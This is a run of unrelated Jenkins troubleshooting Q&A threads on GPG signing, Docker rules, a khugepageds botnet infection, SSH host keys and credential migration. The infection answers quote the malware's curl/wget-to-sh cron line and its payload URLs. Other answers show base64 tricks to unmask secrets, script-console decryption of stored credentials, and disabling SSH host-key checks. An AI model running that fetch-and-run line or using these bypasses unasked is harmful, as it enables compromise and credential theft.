I am trying to copy my entire Jenkins configuration from RHEL 6.7 to RHEL 6.9. Everything looks good after the move, but one Jenkins build is failing with the error below:
Enter pass phrase:
can't connect to `/usr/share/tomcat6/.gnupg/S.gpg-agent': No such file or directory
gpg: skipped "Credit": Bad passphrase
gpg: signing failed: Bad passphrase
Pass phrase check failed
The GPG private key exists in the Jenkins configuration (gpg 1.4.5). The strange thing is that all the other builds are able to sign RPMs; only this one build is failing.
Does anyone know how to fix this?
RPM reads the passphrase using getpass(3) and sends it to gnupg through an additional file descriptor.
This creates two problems that need to be handled by automating signing mechanisms:
1) Some versions of rpm use getpass(3), which reads from a tty (to disable echoing) and so requires setting up a pseudo-tty through which the automated password can be passed to RPM. Make sure you have the pty file system mounted; expect(1) is one way to set up the pty from which the password can be read. There is another approach using /proc file descriptors that can be attempted on Linux. The password is then sent to gnupg using --passphrase-fd, as in the sketch after this list.
2) gnupg2 can also handle persistent passphrases in a separate agent process, which is sometimes tricky to set up and keep running "automatically" because agent detection depends on both the user and process IDs. Your report seems to involve an agent (which means gnupg2 or a special gpg1 configuration), even though you mention 1.4.5 (which would seem to use gnupg1).
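For illustration, a minimal sketch of the --passphrase-fd mechanism from point 1, assuming gnupg1 as mentioned in the question (gnupg 2.1+ would additionally need --pinentry-mode loopback); GPG_PASSPHRASE and the package name are placeholders:
# Feed the passphrase on fd 0 so gpg never prompts on a tty
echo "$GPG_PASSPHRASE" | gpg --batch --passphrase-fd 0 --detach-sign package.rpm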
I see two separate issues in your log that need to be addressed.
can't connect to `/usr/share/tomcat6/.gnupg/S.gpg-agent': No such file or directory
gpg-agent needs to be running as a daemon on the build host, where it listens on a socket for requests. Perhaps it is already running, but Jenkins is looking for its socket in the wrong directory because GNUPGHOME is set to some unusual value; or perhaps gpg-agent isn't running and a new instance needs to be started.
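A quick way to check which situation you are in (a sketch; paths assume the defaults described above):
# Is an agent running, and where does gpg expect its socket?
pgrep -l gpg-agent || echo "no gpg-agent running"
echo "GNUPGHOME=${GNUPGHOME:-$HOME/.gnupg}"
ls -l "${GNUPGHOME:-$HOME/.gnupg}/S.gpg-agent"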
Something like this script can be used to safely attach to an existing gpg-agent or spin up a new instance.
#!/bin/bash
# Decide whether to start the gpg-agent daemon, then
# create the necessary symbolic link at $GNUPGHOME/.gnupg/S.gpg-agent.
SOCKET=S.gpg-agent
pgrep gpg-agent >/dev/null
RETVAL=$?
if [ "$RETVAL" -ne 0 ]; then
    echo "Starting gpg-agent daemon."
    eval "$(gpg-agent --daemon)"
else
    echo "Daemon gpg-agent already running."
fi
# Nasty way to find gpg-agent's socket file...
GPG_SOCKET_FILE=$(find /tmp/gpg-* -name "$SOCKET")
echo "Updating socket file link."
cp -fs "$GPG_SOCKET_FILE" "$GNUPGHOME/.gnupg/S.gpg-agent"
You may want to substitute pidof for pgrep, depending on what's available on your system.
If you do end up starting a new agent, you can check to see that your keys have been loaded into it by running gpg --list-keys. If you don't see it listed, you'll need to add it using gpg --import. Follow the Jenkins docs for Using Credentials.
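For example (the key file path is a placeholder):
# Is the signing key visible to gpg under this account?
gpg --list-keys
# If not, import it and list again
gpg --import /path/to/signing-key.asc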
Resolving the gpg-agent issue may resolve your other issue, so check to see if your job is working before doing anything else.
References:
www.linuxquestions.org
gpg: skipped "Credit": Bad passphrase
The GPG key is protected by a passphrase. rpm is asking for this passphrase and expects it to be manually entered. Of course, Jenkins is running things non-interactively, so that's not going to be possible. We need some way to supply the passphrase to rpm so it can forward it along to gpg, or else we need to supply the passphrase to gpg directly via some sort of caching mechanism.
The Expect Method
By wrapping our rpm --addsign call in an expect script, we can use expect to enter the passphrase headlessly. This practice is fairly common. Assuming the following script named rpm_sign.exp:
#!/usr/bin/expect -f
# Usage: rpm_sign.exp <passphrase> <file>...
set password [lindex $argv 0]
set files [lrange $argv 1 end]
spawn rpm --addsign {*}$files
expect "Enter pass phrase:"
send -- "$password\r"
expect eof
This script can be used in a Jenkins shell step or pipeline as follows:
echo "Signing rpms ..."
sh "./rpm_sign.exp '${GPG_PASSPHRASE}' <list-of-files>"
Please note that, with some modifications, it is possible to specify which GPG identity you want to sign your RPMs with. This is done by passing --define {_gpg_name $YOUR_KEY_ID_HERE} as an argument to rpm inside the wrapper script; note the Tcl syntax. Since we're doing this on Jenkins, which may offer multiple sets of credentials, I assume this is relevant info.
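For illustration, outside the expect wrapper the equivalent rpm invocation would look something like this (KEYID and the package name are placeholders):
# Sign with an explicit GPG identity
rpm --define "_gpg_name KEYID" --addsign package-1.0-1.x86_64.rpm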
References:
aaronhawley.livejournal.com
lists.fedoraproject.org
Other Methods
There are other solutions out there that may be more appropriate to your configuration. One such solution is to use RpmSignPlugin, which uses expect under the hood. Other solutions can be found in this posting on unix.stackexchange.com.
I have a problem when running container_run_and_commit_layer; the error message I get is:
docker not found; do you need to manually configure the docker toolchain?
From what I can see, this is related to the DOCKER variable not being set:
# Resolve the docker tool path
DOCKER=""
DOCKER_FLAGS=""
if [[ -z "$DOCKER" ]]; then
echo >&2 "error: docker not found; do you need to manually configure the docker toolchain?"
exit 1
fi
I'm calling container_repositories() in my WORKSPACE file; am I missing something?
That rule requires Docker to be installed. By default, it expects to find docker via $PATH. When it doesn't, you get that error.
The Setup section of the rules_docker documentation lists all the optional tools and shows how to set custom paths to them. Some of the rules_docker rules don't need any of those, so they'll work fine. The rules that do need those tools give errors like this when the tools aren't installed.
If you install docker now, you might have to bazel clean --expunge after installing it to ensure the repository rule is evaluated again.
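As a quick sanity check, something like this (run as the same user that runs Bazel) can confirm whether docker is visible:
# Is docker on PATH for this user?
which docker || echo "docker is not on PATH"
# After installing docker, force repository rules to re-evaluate
bazel clean --expunge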
A command called khugepageds is using 98 to 100% of the CPU at times.
I tried to find out how Jenkins uses this command, or what to do about it, but was not successful.
I did the following
pkill jenkins
service jenkins stop
service jenkins start
When I pkill it, the usage of course goes down, but once Jenkins restarts, it's back up again.
Anyone had this issue before?
So, we just had this happen to us. As per the other answers, and some digging of our own, we were able to kill the process (and keep it killed) by running the following command...
rm -rf /tmp/*; crontab -r -u jenkins; kill -9 PID_OF_khugepageds; crontab -r -u jenkins; rm -rf /tmp/*; reboot -h now;
Make sure to replace PID_OF_khugepageds with the PID on your machine. It will also clear the crontab entry. Run this all as one command so that the process won't resurrect itself. The machine will reboot per the last command.
NOTE: While the command above should kill the process, you will probably want to roll/regenerate your SSH keys (on the Jenkins machine, BitBucket/GitHub etc., and any other machines that Jenkins had access to) and perhaps even spin up a new Jenkins instance (if you have that option).
Yes, we were also hit by this vulnerability; thanks to pittss's answer we were able to find out a bit more about it.
You should check /var/log/syslog for the curl pastebin script, which starts a cron process on the system; it will try to regain access to the /tmp folder and install unwanted packages/scripts.
You should remove everything from the /tmp folder, stop Jenkins, check the cron entries and remove the ones that seem suspicious, then restart the VM.
The vulnerability drops unwanted executables in the /tmp folder and tries to access the VM via ssh.
It also adds a cron entry on your system; be sure to remove that as well.
Also check the ~/.ssh folder (known_hosts and authorized_keys) for any suspicious SSH public keys; the attacker can add their own keys to keep access to your system, so review the files as shown below.
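For example (assuming Jenkins runs as the jenkins user with the default home):
# Review the Jenkins account's SSH trust material for unknown entries
cat /var/lib/jenkins/.ssh/authorized_keys
cat /var/lib/jenkins/.ssh/known_hosts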
Hope this helps.
This is a Confluence vulnerability https://nvd.nist.gov/vuln/detail/CVE-2019-3396 published on 25 Mar 2019. It allows remote attackers to achieve path traversal and remote code execution on a Confluence Server or Data Center instance via server-side template injection.
Possible solution
Do not run Confluence as root!
Stop botnet agent: kill -9 $(cat /tmp/.X11unix); killall -9 khugepageds
Stop Confluence: <confluence_home>/app/bin/stop-confluence.sh
Remove broken crontab: crontab -u <confluence_user> -r
Plug the hole by blocking access to vulnerable path /rest/tinymce/1/macro/preview in frontend server; for nginx it is something like this:
location /rest/tinymce/1/macro/preview {
return 403;
}
Restart Confluence.
The exploit
It contains two parts: a shell script from https://pastebin.com/raw/xmxHzu5P and an x86_64 Linux binary from http://sowcar.com/t6/696/1554470365x2890174166.jpg.
The script first kills all other known trojan/virus/botnet agents, downloads the binary and spawns it as /tmp/kerberods, and iterates through /root/.ssh/known_hosts trying to spread itself to nearby machines.
The binary (3395072 bytes, dated Apr 5 16:19) is packed with the LSD executable packer (http://lsd.dg.com). I still haven't examined what it does; it looks like a botnet controller.
It seems like a vulnerability. Try looking in the syslog (/var/log/syslog, not the Jenkins log) for something like this: CRON (jenkins) CMD ((curl -fsSL https://pastebin.com/raw/***||wget -q -O- https://pastebin.com/raw/***)|sh).
If you find that, try stopping Jenkins, clearing the /tmp dir, and killing all PIDs started by the jenkins user.
Once CPU usage is down, update to the latest LTS version of Jenkins; then, after starting Jenkins, update all of its plugins.
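A sketch of those steps (the grep pattern matches the cron line quoted above; adjust paths and service commands for your distro):
# Look for the malicious cron entry in syslog
grep -i 'pastebin' /var/log/syslog
# Stop Jenkins, clear /tmp, and kill anything still running as jenkins
service jenkins stop
rm -rf /tmp/*
pkill -9 -u jenkins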
A solution that works (because the cron file just gets recreated) is to empty jenkins' cron file; I also changed its ownership and made the file immutable.
This finally stopped the process from kicking in.
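A sketch of that approach, assuming a Debian-style cron spool (on Red Hat systems the file is /var/spool/cron/jenkins instead):
# Empty the jenkins crontab, take ownership, and make the file immutable
: > /var/spool/cron/crontabs/jenkins
chown root:root /var/spool/cron/crontabs/jenkins
chattr +i /var/spool/cron/crontabs/jenkins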
In my case this was making builds fail randomly with the following error:
Maven JVM terminated unexpectedly with exit code 137
It took me a while to pay due attention to the khugepageds process, since every place I read about this error, the given solution was to increase memory.
The problem was solved with @HeffZilla's solution.
I am trying to deploy to another server from Jenkins server, and I can't do it using Jenkins Build script.
When I am on the Jenkins server, I can deploy. For example:
:/var/lib/jenkins/workspace/MyProject$ scp my_file ubuntu@my_address:~/MyProject
runs perfectly fine. However, when I specify:
scp my_file ubuntu@my_address:~/MyProject
in "Execute Shell" under Build in the Jenkins job configuration, I get the following error:
Host key verification failed.
I know that the first time I ran the above command directly on Jenkins server, I was prompted:
The authenticity of host 'my_address (my_address)' can't be established.
ECDSA key fingerprint is cf:4b:58:66:d6:d6:87:35:76:1c:aa:cf:9a:7c:78:cc.
Are you sure you want to continue connecting (yes/no)?
So I had to type "yes" in order to continue. But since I already did that directly in the terminal, I don't have to do anything extra there anymore.
The second answer to this question, Jenkins Host key verification failed, seems to describe this situation, if I understand it correctly.
What am I missing? What can I do to fix my problem?
I got it working, I needed to do two things:
1) I had to use -o StrictHostKeyChecking=no:
scp -v -o StrictHostKeyChecking=no my_file ubuntu@my_address:~/MyProject
instead of:
scp my_file ubuntu@my_address:~/MyProject
2) I needed to copy my id_rsa to /var/lib/jenkins/.ssh
The /var/lib/jenkins/.ssh folder and files inside of it need to be owned by jenkins.
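For example:
# Fix ownership and the permissions sshd insists on
chown -R jenkins:jenkins /var/lib/jenkins/.ssh
chmod 700 /var/lib/jenkins/.ssh
chmod 600 /var/lib/jenkins/.ssh/id_rsa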
Old question, but maybe someone will find this useful:
ssh root@jenkinsMaster 'echo "$(ssh-keyscan -t rsa,dsa jenkinsSlave)" >> /root/.ssh/known_hosts'
Make sure that you first set up the SSH connection to the remote host; then try to copy things to it.
ssh -o StrictHostKeyChecking=no user@ip_addr
scp file_name user@ip_addr:/home/user
I am using the credentials plugin in Jenkins to manage credentials for git and database access for my team's builds. I would like to copy the credentials from one jenkins instance to another, independent jenkins instance. How would I go about doing this?
UPDATE: TL;DR: Follow the link provided below in a comment by Filip Stachowiak; it is the easiest way to do it. In case it doesn't work for you, read on.
Copying the $HUDSON_HOME/credentials.xml is not the solution, because Jenkins encrypts passwords and these can't be decrypted by another instance unless both share a common key.
So, either you use the same encryption keys in both Jenkins instances (see Where's the encryption key stored in Jenkins?) or you can do the following:
Create the same user/password that you need to share in the 2nd Jenkins instance, so that a valid password is generated.
What is really important is that the credential IDs in both credentials.xml files are the same. In the credentials.xml example below, for the user jenkins, the identifier <id>c4855f57-5107-4b69-97fd-298e56a9977d</id> must be the same in both credentials.xml files.
<com.cloudbees.plugins.credentials.SystemCredentialsProvider plugin="credentials@1.22">
  <domainCredentialsMap class="hudson.util.CopyOnWriteMap$Hash">
    <entry>
      <com.cloudbees.plugins.credentials.domains.Domain>
        <specifications/>
      </com.cloudbees.plugins.credentials.domains.Domain>
      <java.util.concurrent.CopyOnWriteArrayList>
        <com.cloudbees.plugins.credentials.impl.UsernamePasswordCredentialsImpl>
          <scope>GLOBAL</scope>
          <id>c4855f57-5107-4b69-97fd-298e56a9977d</id>
          <description>Para SVN</description>
          <username>jenkins</username>
          <password>J1ztA2vSXHbm60k5PjLl5jg70ZooSFKF+kRAo08UVts=</password>
        </com.cloudbees.plugins.credentials.impl.UsernamePasswordCredentialsImpl>
      </java.util.concurrent.CopyOnWriteArrayList>
    </entry>
  </domainCredentialsMap>
</com.cloudbees.plugins.credentials.SystemCredentialsProvider>
I was also facing the same problem. What worked for me was copying credentials.xml, config.xml, and the secrets folder from the existing Jenkins to the new instance. After restarting Jenkins, things worked fine.
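Something like this, assuming the default JENKINS_HOME of /var/lib/jenkins on both hosts:
# On the old instance: bundle the encrypted credentials plus the keys that decrypt them
tar czf /tmp/jenkins-creds.tgz -C /var/lib/jenkins credentials.xml config.xml secrets
# Copy the archive to the new instance, unpack it into JENKINS_HOME there, and restart Jenkins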
This is what worked for me.
Create a job in Jenkins that takes the credentials and writes them to output. If Jenkins replaces the password in the output with ****, just obfuscate it first (add a space between each character, reverse the characters, base64 encode it, etc.)
I used a PowerShell job to base64 encode it:
[convert]::ToBase64String([text.encoding]::Default.GetBytes($mysecret))
And then used PowerShell to convert the base64 string back to a regular string:
[text.encoding]::Default.GetString([convert]::FromBase64String("bXlzZWNyZXQ="))
After trying quite a few things over several days, this is the best solution I found for migrating my secrets from a Jenkins 2.176 to a new, clean Jenkins 2.249.1: jenkins-cli was the best approach for me.
The process is quite simple: dump the credentials from the old instance to a local machine (or a Docker pod with Java installed) as an unencrypted XML file, then upload it to the new instance.
Before starting you should verify the following:
Access to the credentials section on both Jenkins instances
Download the jenkins-cli.jar from one of the instances (https://www.your-jenkins-url.com/cli/)
Have User and Password/Token at hand.
Notice: In case your Jenkins uses an OAuth service, you will need to create a token for your user. Once logged into Jenkins, click your profile at the top right; there you can verify your username and generate an API token.
Now for the special sauce, you have to execute both parts from the same machine/pod:
Notice: If your instances are using valid certificates and you want to secure your connection, you must remove the -noCertificateCheck flag from both commands.
# OLD JENKINS DUMP #
export USER=madox@example.com
export TOKEN=f561banana6ead83b587a4a8799c12c307
export SERVER=https://old-jenkins-url.com/
java -jar jenkins-cli.jar -noCertificateCheck -s $SERVER -auth $USER:$TOKEN list-credentials-as-xml "system::system::jenkins" > /tmp/jenkins_credentials.xml
# NEW JENKINS IMPORT #
export USER=admin
export TOKEN=admin
export SERVER=https://new-jenkins-url.com/
java -jar jenkins-cli.jar -noCertificateCheck -s $SERVER -auth $USER:$TOKEN import-credentials-as-xml "system::system::jenkins" < /tmp/jenkins_credentials.xml
If you have the credentials.xml available and the old Jenkins instance still running, there is a way to decrypt individual credentials so you can enter them in the new Jenkins instance via the UI.
The approach is described over at the DevOps stackexchange by kenorb.
This does not convert all the credentials for an easy, automated migration, but helps when you have only few credentials to migrate (manually).
To summarize, you visit the /script page over at the old Jenkins instance, and use the encrypted credential from the credentials.xml file in the following line:
println(hudson.util.Secret.decrypt("{EncryptedCredentialFromCredentialsXml=}"))
To migrate all credentials to a new server, from Jenkins: Migrating credentials:
Stop Jenkins on new server.
new-server # /etc/init.d/jenkins stop
Remove the identity.key.enc file on new server:
new-server # rm identity.key.enc
Copy secret* and credentials.xml to new server.
current-server # cd /var/lib/jenkins
current-server # tar czvf /tmp/credentials.tgz secret* credentials.xml
current-server # scp /tmp/credentials.tgz $user@$new-server:/tmp/
new-server # cd /var/lib/jenkins
new-server # tar xzvf /tmp/credentials.tgz -C ./
Start Jenkins.
new-server # /etc/init.d/jenkins start
Migrating users from one Jenkins instance to another Jenkins on a new server:
I tried following https://stackoverflow.com/a/35603191, which led to https://itsecureadmin.com/2018/03/26/jenkins-migrating-credentials/. However, I did not succeed in following these steps.
Instead, I experimented with exporting the /var/lib/jenkins/users (or ${JENKINS_HOME}/users) directory to the new instance on the new server. After restarting Jenkins on the new server, it looks like all the user credentials are available there.
Additionally, I cross-checked if the users can log in to the new Jenkins instance. It works for now.
PS: These commands are for Red Hat servers.
Old server:
cd /var/lib/jenkins
(or cd into wherever your Jenkins home is)
tar cvzf users.tgz ./users
New server:
cd /var/lib/jenkins
scp <user>@<oldserver>:/var/lib/jenkins/users.tgz /var/lib/jenkins/.
sudo tar xvzf users.tgz
systemctl restart jenkins
Did you try to copy the $JENKINS_HOME/users folder and the $JENKINS_HOME/credentials.xml file to the other Jenkins instance?
I have a problem with Jenkins: setting up "git" shows the following error:
Failed to connect to repository : Command "git ls-remote -h https://person#bitbucket.org/person/projectmarket.git HEAD" returned status code 128:
stdout:
stderr: fatal: Authentication failed
I have tested with ssh:
git@bitbucket.org:person/projectmarket.git
This is error:
Failed to connect to repository : Command "git ls-remote -h git#bitbucket.org:person/projectmarket.git HEAD" returned status code 128:
stdout:
stderr: Host key verification failed.
fatal: The remote end hung up unexpectedly
I've also done these steps with "SSH key".
Login under Jenkins
sudo su jenkins
Copy your github key to Jenkins .ssh folder
cp ~/.ssh/id_rsa_github* /var/lib/jenkins/.ssh/
Rename the keys
mv id_rsa_github id_rsa
mv id_rsa_github.pub id_rsa.pub
but the git repository is still not working in Jenkins.
Thanks for the help!
Change to the jenkins user and run the command manually:
git ls-remote -h git@bitbucket.org:person/projectmarket.git HEAD
You will get the standard SSH warning when first connecting to a new host via SSH:
The authenticity of host 'bitbucket.org (207.223.240.181)' can't be established.
RSA key fingerprint is 97:8c:1b:f2:6f:14:6b:5c:3b:ec:aa:46:46:74:7c:40.
Are you sure you want to continue connecting (yes/no)?
Type yes and press Enter. The host key for bitbucket.org will now be added to the ~/.ssh/known_hosts file and you won't get this error in Jenkins anymore.
Jenkins is a service account; it doesn't have a shell by design. It is generally accepted that service accounts shouldn't be able to log in interactively.
To resolve "Jenkins Host key verification failed", do the following steps. I have used mercurial with jenkins.
1) Execute the following command in a terminal and provide the password:
$ sudo su -s /bin/bash jenkins
2) Generate a public/private key pair using the following command:
ssh-keygen
You will see output like:
Generating public/private rsa key pair.
Enter file in which to save the key (/var/lib/jenkins/.ssh/id_rsa):
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
3) Press Enter, do not give any passphrase, and press Enter again. The key has now been generated.
4) Run cat /var/lib/jenkins/.ssh/id_rsa.pub
5) Copy the key from id_rsa.pub
6) Exit from bash
7) ssh user@yourrepository (the user is whatever account you use on the repository server)
8) vi .ssh/authorized_keys
9) Paste the key
10) exit
11) Manually log in to the Mercurial server once
Note: Please do log in manually; otherwise Jenkins will again give the error "host verification failed".
12) Once that manual login is done, go to Jenkins and start a build.
Enjoy!!!
Good Luck
Or you can use:
ssh -oStrictHostKeyChecking=no host
This is insecure (open to man-in-the-middle attacks), but it is the easiest solution.
A better way is to generate correct mappings between host and IP address, so ssh will not complain:
#!/bin/bash
for domain in "github.com" "bitbucket.org"; do
sed -i "/$domain/d" ~/.ssh/known_hosts
line=$(ssh-keyscan $domain,`nslookup $domain | awk '/^Address: / { print $2 ; exit }'`)
echo $line >> ~/.ssh/known_hosts
done
Excerpt from gist.
I think many people haven't noticed this: since Jenkins 2.361 there is a built-in Git Host Key Verification Configuration (see the answer below about the Manage Jenkins security page).
By the way, "No verification" is surely not the best option.
Had the same problem; I fixed it like this:
Reset permissions on id_rsa* so that only the current user has access (no group, no other):
chmod o-rwx ~/.ssh/id*
chmod g-rwx ~/.ssh/id*
ls -lart ~/.ssh/
-rw------- 1 jenkins nogroup 398 avril 3 09:34 id_rsa.pub
-rw------- 1 jenkins nogroup 1675 avril 3 09:34 id_rsa
And clear ~/.ssh/known_hosts.
Now connect as jenkins:
sudo su jenkins
Try the command Jenkins runs:
git ls-remote -h git@bitbucket.org:user/project.git HEAD
If no problem appears, Jenkins will now be able to connect to the repo (for me, at least ^^).
As for the workaround (e.g. Windows slave), define the following environment variable in global properties:
GIT_SSH_COMMAND="ssh -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no"
Note: If you don't see the option, you probably need EnvInject plugin for it.
Log in as jenkins using: sudo su -s /bin/bash jenkins
git clone the desired repo which causes the key error
It will ask you to add the key, with a yes/no prompt (enter yes or y)
That's it!
You can now re-run the Jenkins job.
I hope this fixes your issue.
If you are using an HTTPS URL such as https://bitbucket.org/YYYY/XX.git, you should delete the username@ part.
Make sure you are not editing any of the default sshd_config properties, to rule those out as a cause of the error.
"Host key verification failed" definitely means a missing hostname entry in the known_hosts file.
Login to the server where the process is failing and do the following:
Sudo to the user running the process
ssh-copy-id destinationuser@destinationhostname
It will prompt like this for the first time, say yes and it will also ask password for the first time:
The authenticity of host 'sample.org (205.214.640.91)' can't be established.
RSA key fingerprint is 97:8c:1b:f2:6f:14:6b:5c:3b:ec:aa:46:46:74:7c:40.
Are you sure you want to continue connecting (yes/no)? *yes*
When prompted for the password, enter it.
Now, from the server where the process is running, do ssh destinationuser@destinationhostname. It should log in without a password.
Note: Do not change the default permissions of files in the user's .ssh directory, you will end up with different issues
I ran into this issue and it turned out the problem was that the jenkins service wasn't being run as the jenkins user. So running the commands as the jenkins user worked just fine.
Copy host keys from both bitbucket and github:
ssh root#deployserver 'echo "$(ssh-keyscan -t rsa,dsa bitbucket.org)" >> /root/.ssh/known_hosts'
ssh root#deployserver 'echo "$(ssh-keyscan -t rsa,dsa github.com)" >> /root/.ssh/known_hosts'
The best way is to just use your git URL in HTTPS format in the Jenkinsfile or wherever you want:
git url: 'https://github.com/jglick/simple-maven-project-with-tests.git'
SSH
If you are trying it with SSH, the host key verification error can occur for several reasons. Follow these steps to rule them all out.
Set the HOME environment variable to the directory that contains your .ssh folder, e.g. C:/Users/Name if your .ssh is kept inside the Name folder.
Now make sure that the public SSH key is also registered with the repository host, whether that is GitHub, Bitbucket, or any other.
Open Git Bash and try cloning the project from the repository. This will add the repository's host key to the known_hosts file, which is created automatically in the .ssh folder.
Now open Jenkins and create a new job, then click Configure.
Provide the clone URL in Source Code Management under Git. The URL should start with git@github.com/......... or ssh://proje........
Under Credentials you need to add the username and password of the repository from which you are cloning the project. Select that credential.
Now apply and save the configuration.
Bingo! Start building the project. I hope you will not get any host key verification error now!
Try
ssh-keygen -R hostname
-R hostname Removes all keys belonging to hostname from a known_hosts file. This option is useful to delete hashed hosts
Using ssh-keyscan should be much easier:
ssh-keyscan bitbucket.org >> ~/.ssh/known_hosts
This command will put all required hosts to ~/.ssh/known_hosts. You will need to run this command inside your Jenkins machine. You can also create a job and put that command into the "Execute shell" section of the Configure of that job and then execute the job.
The issue is with /var/lib/jenkins/.ssh/known_hosts. It exists in the first case, but not in the second one. This means you are running on a different system, or the second case is somehow jailed in a chroot or otherwise separated from the rest of the filesystem (which is a good idea for running random code from Jenkins).
The next steps are to find out how the chroots for this user are created and to modify the known_hosts inside that chroot. Or just go another way of ignoring known hosts, such as ssh-keyscan, StrictHostKeyChecking=no, or similar.
After ssh-keygen, one probably only needs to copy the public key to the remote host with:
ssh-copy-id -i ~/.ssh/mykey user@host
There is a safe and relatively easy way to accomplish this, which should also work if you have separate worker nodes/clouds (like docker/kubernetes).
Adding host keys to Jenkins configuration
First go to a console and execute ssh-keyscan your_git_server.url
Copy the output of that command
Then navigate to https://YOUR_JENKINS_URL/manage/configureSecurity/
Scroll down to Git Host Key Verification Configuration
Paste the output of the command into the text box.
Both bitbucket and github have pages about their keys and servers. Read them and ensure that you are adding the proper keys and not some random keys
Getting the ssh-keyscan via your Jenkins installation
If you for some reason do not have ssh-keyscan, you can go to the script console ( https://YOUR_JENKINS_URL/manage/script ) and paste in the following script:
def sout = new StringBuilder(), serr = new StringBuilder()
def proc = 'ssh-keyscan bitbucket.org'.execute()
proc.consumeProcessOutput(sout, serr)
proc.waitForOrKill(1000)
println "copy this to jenkins>\n$sout"
//println "err> $serr"